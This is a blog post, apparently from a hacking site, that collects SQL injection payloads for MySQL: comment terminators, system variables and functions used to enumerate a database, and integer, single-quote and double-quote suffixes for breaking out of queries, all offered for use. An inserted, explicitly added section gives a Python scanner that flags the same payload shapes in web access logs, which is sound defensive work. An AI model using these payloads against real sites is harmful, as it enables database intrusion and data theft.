
Fix SQL Injection Query (Collection)

This time I want to share an article about Fix SQL Injection Query.

Here is the collection of queries:

Comment Name
-- : MySQL Linux Style
--+ : MySQL Windows Style
# : Hash (URL encode while use)
--+- : SQL Comment
; : Null Byte
` : Backtick

Variable/Function Output
@@hostname : Current Hostname
@@tmpdir : Temp Directory
@@datadir : Data Directory
@@version : Version of DB
@@basedir : Base Directory
user() : Current User
database() : Current Database
version() : Version
schema() : Current Database
UUID() : System UUID key
current_user() : Current User
current_user : Current User
system_user() : Current System User
session_user() : Session user
@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl : Check if it has SSL or not

integer based
--
-- -
--+-
)--
)-- -
)--+-
))--
))-- -
))--+-
;
) ;
));
%23
%60
%90
and 1=1
and '1'='1
and (1)=(1
php?id=(1) -- -

string based
'--+-
')-- -
')--+-
'))-- -
'))--+-
';
');
'));
'%23
'%60
'%90
' and 1=1
' and '1'='1
' and (1)=(1
php?id=(1') -- -

string based double quotes
"-- -
"--+-
"%23
")-- -
")--+-
"))--+-
";
") ;
"));
"%60
"%90
" and 1=1
" and '1'='1
" and (1)=(1
php?id=(1") -- -
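
Seen from the defending side, the suffixes in the three lists above leave a recognizable shape in request logs. The following added example (not part of the original post) classifies URL-decoded query parameters by the list they resemble; the log lines, addresses, `/item.php` path and function names are constructed assumptions, and the `%90` entries are not handled.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Optional quote, optional closing parentheses, then a trailing terminator from the
# lists: "--", "-- -", "--+-" ("+" decodes to a space), "#" (%23), "`" (%60) or ";".
TERMINATOR = re.compile(r"""(?P<quote>['"]?)\s*\)*\s*(?:--[\s-]*|[#`;])\s*$""")
# Boolean forms from the lists: and 1=1, and '1'='1, and (1)=(1
BOOLEAN = re.compile(r"""(?P<quote>['"]?)\s*\band\s+['"(]*1['")]*\s*=\s*['"(]*1""", re.I)
# Client address and request target of a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/')
CATEGORY = {"": "integer", "'": "string-single", '"': "string-double"}


def classify(value):
    """Name the list a decoded parameter value resembles, or return None."""
    match = TERMINATOR.search(value) or BOOLEAN.search(value)
    return CATEGORY[match.group("quote")] if match else None


def scan_log(lines):
    """Return (client, parameter, category) for every flagged query parameter."""
    hits = []
    for line in lines:
        request = REQUEST.match(line)
        if not request:
            continue
        client, target = request.groups()
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            category = classify(value)
            if category:
                hits.append((client, name, category))
    return hits


# Constructed sample lines: documentation addresses and hypothetical paths.
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=7 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=7))--+- HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=7%27)--+- HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=7%22+and+(1)=(1 HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=salt+and+pepper HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A trailing `;` or `--` also occurs in benign input, so hits are leads to correlate (one client cycling through several variants on the same parameter), not verdicts.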

That's all from me; I hope it's useful.

Source: http://maqlo-heker.blogspot.com/